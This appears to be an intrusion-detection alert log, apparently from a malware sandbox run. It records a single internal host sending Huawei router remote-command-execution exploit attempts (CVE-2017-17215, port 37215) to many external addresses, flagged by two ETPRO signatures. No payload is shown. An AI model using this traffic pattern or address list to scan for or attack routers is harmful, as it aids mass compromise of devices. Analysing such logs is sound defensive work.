                                            06/14/24-10:43:52.159223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5044837215192.168.2.1441.184.220.160
                                            06/14/24-10:44:00.323225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3914237215192.168.2.14197.174.170.227
                                            06/14/24-10:43:50.075270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5151637215192.168.2.14197.15.19.58
                                            06/14/24-10:44:04.406210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5710637215192.168.2.14156.75.27.252
                                            06/14/24-10:43:58.273070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3349837215192.168.2.1441.7.80.119
                                            06/14/24-10:44:10.562889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4484037215192.168.2.14156.78.67.98
                                            06/14/24-10:43:36.700555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5271237215192.168.2.14156.167.152.186
                                            06/14/24-10:43:45.988063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4637037215192.168.2.14156.134.197.62
                                            06/14/24-10:43:43.943628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3958437215192.168.2.14156.47.240.188
                                            06/14/24-10:43:48.045626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3443437215192.168.2.1441.7.198.145
                                            06/14/24-10:43:36.700634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3348237215192.168.2.1441.13.20.24
                                            06/14/24-10:43:54.201164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5834637215192.168.2.1441.183.40.34
                                            06/14/24-10:44:14.666134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3890237215192.168.2.1441.147.242.221
                                            06/14/24-10:44:08.504925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5498837215192.168.2.14156.142.117.29
                                            06/14/24-10:44:16.715634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3891437215192.168.2.14156.37.39.106
                                            06/14/24-10:44:20.805996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3747437215192.168.2.14197.232.159.244
                                            06/14/24-10:43:58.290348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3524637215192.168.2.14197.125.52.30
                                            06/14/24-10:44:06.451681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5648237215192.168.2.14197.185.88.120
                                            06/14/24-10:44:02.383745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4481037215192.168.2.14197.180.199.79
                                            06/14/24-10:44:04.411391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4558637215192.168.2.1441.182.36.67
                                            06/14/24-10:44:04.421620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4649237215192.168.2.14156.127.160.124
                                            06/14/24-10:44:29.014016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5950237215192.168.2.14156.207.52.203
                                            06/14/24-10:43:58.293355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5128637215192.168.2.1441.57.134.209
                                            06/14/24-10:44:26.980404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5764437215192.168.2.14156.231.95.249
                                            06/14/24-10:43:58.292847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5188437215192.168.2.1441.127.238.145
                                            06/14/24-10:44:08.519213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3434437215192.168.2.1441.49.181.194
                                            06/14/24-10:43:58.276514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5094437215192.168.2.1441.124.103.141
                                            06/14/24-10:44:16.734265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3393037215192.168.2.1441.161.84.169
                                            06/14/24-10:44:33.151382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3330637215192.168.2.14197.226.51.167
                                            06/14/24-10:44:16.734782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5577237215192.168.2.14156.144.247.254
                                            06/14/24-10:44:06.470084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4435237215192.168.2.14156.145.106.92
                                            06/14/24-10:44:29.022169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4416637215192.168.2.1441.218.213.204
                                            06/14/24-10:44:31.053672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5829837215192.168.2.1441.27.151.172
                                            06/14/24-10:43:56.243888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4017437215192.168.2.14197.188.18.128
                                            06/14/24-10:43:41.849959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5501437215192.168.2.14156.58.23.199
                                            06/14/24-10:44:00.336046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4159237215192.168.2.14197.20.182.72
                                            06/14/24-10:44:27.002019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4626837215192.168.2.14197.155.46.227
                                            06/14/24-10:44:29.011249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3429437215192.168.2.14156.212.211.202
                                            06/14/24-10:44:22.860585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5294237215192.168.2.14197.132.190.72
                                            06/14/24-10:44:02.383203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3775437215192.168.2.1441.246.141.131
                                            06/14/24-10:44:04.422357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3851437215192.168.2.14156.153.157.114
                                            06/14/24-10:44:06.452861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4064437215192.168.2.14156.195.143.148
                                            06/14/24-10:44:29.022377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4651237215192.168.2.14197.43.161.43
                                            06/14/24-10:44:35.182821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3392837215192.168.2.1441.246.178.58
                                            06/14/24-10:44:04.406962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5051037215192.168.2.1441.231.237.25
                                            06/14/24-10:44:10.543535TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4813237215192.168.2.14156.246.58.138
                                            06/14/24-10:43:45.965642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5504637215192.168.2.14197.81.232.194
                                            06/14/24-10:44:00.344304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4032037215192.168.2.14156.96.167.159
                                            06/14/24-10:44:18.776203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4780437215192.168.2.1441.171.30.157
                                            06/14/24-10:44:10.564099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3842637215192.168.2.14197.228.148.240
                                            06/14/24-10:43:52.160042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3646837215192.168.2.14197.52.176.13
                                            06/14/24-10:44:16.714764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5565237215192.168.2.14156.155.214.222
                                            06/14/24-10:44:29.011372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3967037215192.168.2.1441.214.219.211
                                            06/14/24-10:43:48.021930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4231837215192.168.2.14197.167.192.17
                                            06/14/24-10:43:34.663033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5860837215192.168.2.1441.135.86.170
                                            06/14/24-10:43:45.966912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5950637215192.168.2.14156.182.101.237
                                            06/14/24-10:44:06.453229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4515037215192.168.2.14156.183.35.65
                                            06/14/24-10:44:22.857497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5651637215192.168.2.1441.146.218.163
                                            06/14/24-10:44:31.055298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3855837215192.168.2.14197.156.75.185
                                            06/14/24-10:43:39.789773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4361837215192.168.2.1441.20.33.144
                                            06/14/24-10:44:26.978893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3548837215192.168.2.14156.195.49.197
                                            06/14/24-10:44:08.502242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5893837215192.168.2.14156.215.203.91
                                            06/14/24-10:44:18.761970TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4947237215192.168.2.1441.142.55.145
                                            06/14/24-10:44:16.715659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5652237215192.168.2.14156.117.136.51
                                            06/14/24-10:44:06.471653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3399637215192.168.2.14197.201.201.165
                                            06/14/24-10:43:58.290981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6076837215192.168.2.1441.213.204.126
                                            06/14/24-10:44:06.453588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5519037215192.168.2.14156.82.201.81
                                            06/14/24-10:44:12.641967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3951637215192.168.2.1441.222.81.52
                                            06/14/24-10:44:24.914737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5989237215192.168.2.1441.249.32.223
                                            06/14/24-10:43:39.791971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4314237215192.168.2.14197.167.11.241
                                            06/14/24-10:44:02.383880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3752837215192.168.2.14197.108.114.172
                                            06/14/24-10:44:10.545076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4486237215192.168.2.1441.141.106.145
                                            06/14/24-10:44:00.339428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3710237215192.168.2.1441.78.92.143
                                            06/14/24-10:43:41.898056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5016237215192.168.2.1441.223.35.223
                                            06/14/24-10:43:34.661880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5142437215192.168.2.14156.92.179.212
                                            06/14/24-10:43:45.991547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4248437215192.168.2.1441.60.19.36
                                            06/14/24-10:43:36.704602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3825237215192.168.2.14156.121.211.4
                                            06/14/24-10:44:16.735016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4506037215192.168.2.14156.100.111.78
                                            06/14/24-10:44:29.010803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6068637215192.168.2.1441.238.148.17
                                            06/14/24-10:43:43.972068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4079837215192.168.2.1441.172.149.138
                                            06/14/24-10:44:00.342502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291437215192.168.2.14156.120.216.16
                                            06/14/24-10:44:16.717626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4398837215192.168.2.14156.89.152.37
                                            06/14/24-10:44:29.012155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3712437215192.168.2.14156.200.252.56
                                            06/14/24-10:43:34.678726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3755637215192.168.2.14197.152.249.204
                                            06/14/24-10:43:54.200093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4187437215192.168.2.14156.175.182.5
                                            06/14/24-10:43:52.150721TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4229637215192.168.2.14197.167.92.14
                                            06/14/24-10:44:26.977118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5712437215192.168.2.1441.150.13.125
                                            06/14/24-10:44:35.180815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3310237215192.168.2.14156.188.57.40
                                            06/14/24-10:44:00.324078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5114437215192.168.2.14197.186.194.186
                                            06/14/24-10:43:41.849546TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4920437215192.168.2.14197.60.87.19
                                            06/14/24-10:43:50.111390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4660637215192.168.2.1441.48.218.73
                                            06/14/24-10:43:58.278049TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4222037215192.168.2.1441.79.118.71
                                            06/14/24-10:44:24.915396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5671237215192.168.2.14197.104.197.232
                                            06/14/24-10:44:14.688942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4720237215192.168.2.1441.144.78.172
                                            06/14/24-10:44:33.151533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5169237215192.168.2.14156.111.205.3
                                            06/14/24-10:43:43.968864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5983237215192.168.2.1441.203.73.23
                                            06/14/24-10:44:16.737850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3801037215192.168.2.14197.117.157.79
                                            06/14/24-10:43:41.846024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4225837215192.168.2.1441.117.215.153
                                            06/14/24-10:43:54.201773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3673437215192.168.2.14197.157.81.33
                                            06/14/24-10:44:16.735058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5868837215192.168.2.14197.234.191.209
                                            06/14/24-10:43:54.200437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5226037215192.168.2.14197.3.41.6
                                            06/14/24-10:44:00.343782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5710437215192.168.2.14156.225.13.142
                                            06/14/24-10:43:54.200040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4835037215192.168.2.14197.147.193.49
                                            06/14/24-10:44:08.503436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4981037215192.168.2.1441.52.165.213
                                            06/14/24-10:43:39.807803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3653837215192.168.2.14197.14.34.11
                                            06/14/24-10:44:18.763296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5539437215192.168.2.14156.51.118.90
                                            06/14/24-10:44:31.052384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4703437215192.168.2.14156.246.176.204
                                            06/14/24-10:44:06.471048TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3418037215192.168.2.1441.9.221.163
                                            06/14/24-10:43:41.910398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3283637215192.168.2.14156.55.162.129
                                            06/14/24-10:44:31.088657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4160437215192.168.2.14156.6.224.74
                                            06/14/24-10:43:41.910587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5506637215192.168.2.1441.180.82.4
                                            06/14/24-10:44:16.733309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5644237215192.168.2.14197.55.182.53
                                            06/14/24-10:43:48.017857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4372637215192.168.2.1441.207.17.243
                                            06/14/24-10:43:36.718571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4379837215192.168.2.14156.154.140.211
                                            06/14/24-10:43:56.230410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5827837215192.168.2.14197.10.213.231
                                            06/14/24-10:43:43.944327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4396037215192.168.2.1441.13.253.145
                                            06/14/24-10:44:10.563429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5713637215192.168.2.1441.206.232.39
                                            06/14/24-10:43:41.850043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4853837215192.168.2.14197.36.168.96
                                            06/14/24-10:43:50.070349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3552037215192.168.2.14156.235.60.164
                                            06/14/24-10:44:29.012304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5409237215192.168.2.14156.65.227.103
                                            06/14/24-10:44:08.502824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3340237215192.168.2.14156.230.47.14
                                            06/14/24-10:44:14.673035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4862237215192.168.2.14197.8.193.237
                                            06/14/24-10:43:50.113738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5020237215192.168.2.14156.14.231.31
                                            06/14/24-10:44:04.406763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4080837215192.168.2.1441.49.145.50
                                            06/14/24-10:44:00.340450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5777437215192.168.2.14156.130.137.198
                                            06/14/24-10:44:04.410511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3500837215192.168.2.1441.157.247.43
                                            06/14/24-10:44:31.093082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5247037215192.168.2.1441.153.123.96
                                            06/14/24-10:44:29.011964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3973837215192.168.2.1441.199.85.9
                                            06/14/24-10:44:12.624398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4678837215192.168.2.14197.70.177.19
                                            06/14/24-10:44:20.805391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3702437215192.168.2.14156.120.137.247
                                            06/14/24-10:43:37.763071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4562837215192.168.2.1441.34.32.94
                                            06/14/24-10:44:18.762877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3879237215192.168.2.1441.118.233.237
                                            06/14/24-10:44:18.761492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3669637215192.168.2.14197.93.171.60
                                            06/14/24-10:44:16.717684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3861437215192.168.2.14156.179.62.132
                                            06/14/24-10:44:12.646973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197637215192.168.2.14197.103.31.74
                                            06/14/24-10:44:14.681215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5703237215192.168.2.14197.50.8.201
                                            06/14/24-10:44:10.548232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5671237215192.168.2.14197.165.9.53
                                            06/14/24-10:44:02.367151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5273237215192.168.2.1441.164.228.85
                                            06/14/24-10:43:50.115441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3317237215192.168.2.1441.123.95.20
                                            06/14/24-10:44:16.715391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5863237215192.168.2.1441.93.221.2
                                            06/14/24-10:44:29.011732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4942237215192.168.2.14197.48.0.156
                                            06/14/24-10:44:33.133558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3553837215192.168.2.14197.48.62.55
                                            06/14/24-10:43:45.990711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5413837215192.168.2.1441.114.26.35
                                            06/14/24-10:43:56.242646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492437215192.168.2.14156.206.193.186
                                            06/14/24-10:44:04.421576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5136837215192.168.2.14197.225.222.231
                                            06/14/24-10:44:10.581477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4821637215192.168.2.1441.109.146.252
                                            06/14/24-10:43:41.906594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5330237215192.168.2.14156.28.82.77
                                            06/14/24-10:44:00.343614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5342237215192.168.2.14156.19.95.211
                                            06/14/24-10:43:48.021516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4939637215192.168.2.1441.229.180.96
                                            06/14/24-10:43:43.972221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5821037215192.168.2.14156.67.168.160
                                            06/14/24-10:43:43.943083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3521237215192.168.2.14156.45.197.221
                                            06/14/24-10:44:35.180537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3867437215192.168.2.14197.192.167.86
                                            06/14/24-10:43:54.184638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5929437215192.168.2.14197.160.178.214
                                            06/14/24-10:43:39.791934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4585637215192.168.2.1441.7.38.149
                                            06/14/24-10:43:56.242049TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4703837215192.168.2.1441.211.207.214
                                            06/14/24-10:44:22.859381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4664837215192.168.2.14197.184.88.189
                                            06/14/24-10:44:08.504295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4144237215192.168.2.1441.0.157.52
                                            06/14/24-10:44:16.714977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5077837215192.168.2.14156.235.110.38
                                            06/14/24-10:44:20.828303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3978037215192.168.2.1441.163.138.195
                                            06/14/24-10:44:18.780073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432037215192.168.2.1441.19.178.111
                                            06/14/24-10:43:58.291976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3489037215192.168.2.14197.118.104.97
                                            06/14/24-10:44:20.807126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5205637215192.168.2.14156.41.134.120
                                            06/14/24-10:43:48.021239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3838637215192.168.2.1441.144.219.87
                                            06/14/24-10:44:33.134582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3860237215192.168.2.14156.148.215.136
                                            06/14/24-10:43:37.760589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4856037215192.168.2.1441.151.148.107
                                            06/14/24-10:44:18.778052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4872437215192.168.2.14197.236.87.61
                                            06/14/24-10:44:00.320870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3822437215192.168.2.1441.161.70.90
                                            06/14/24-10:44:14.669159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3919037215192.168.2.14156.57.32.173
                                            06/14/24-10:44:08.505285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4605237215192.168.2.14197.221.151.85
                                            06/14/24-10:44:00.342908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3462637215192.168.2.14197.122.121.28
                                            06/14/24-10:43:36.725407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5174637215192.168.2.14156.244.250.131
                                            06/14/24-10:43:43.972359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4894437215192.168.2.14156.188.25.245
                                            06/14/24-10:43:52.147024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4149037215192.168.2.14197.218.190.249
                                            06/14/24-10:43:58.274973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3582437215192.168.2.14197.50.219.165
                                            06/14/24-10:44:35.178313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4648837215192.168.2.1441.43.2.221
                                            06/14/24-10:44:04.421203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5745837215192.168.2.1441.86.176.206
                                            06/14/24-10:44:10.546580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5087037215192.168.2.14156.215.32.71
                                            06/14/24-10:44:10.567434TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5125237215192.168.2.14156.137.207.94
                                            06/14/24-10:43:36.724501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4541837215192.168.2.14197.29.229.122
                                            06/14/24-10:43:45.987635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4199437215192.168.2.14156.122.50.136
                                            06/14/24-10:44:18.764067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4502237215192.168.2.14156.42.213.5
                                            06/14/24-10:44:10.564490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4884637215192.168.2.1441.136.152.74
                                            06/14/24-10:44:24.915178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3767437215192.168.2.14156.54.52.221
                                            06/14/24-10:44:08.503754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3829437215192.168.2.1441.117.164.62
                                            06/14/24-10:44:10.545623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4680837215192.168.2.14197.147.234.252
                                            06/14/24-10:44:10.547894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4860437215192.168.2.14156.29.176.44
                                            06/14/24-10:43:48.021960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3783637215192.168.2.14156.159.182.11
                                            06/14/24-10:43:36.702596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6097237215192.168.2.14197.221.214.189
                                            06/14/24-10:43:54.185104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5343437215192.168.2.14197.220.122.29
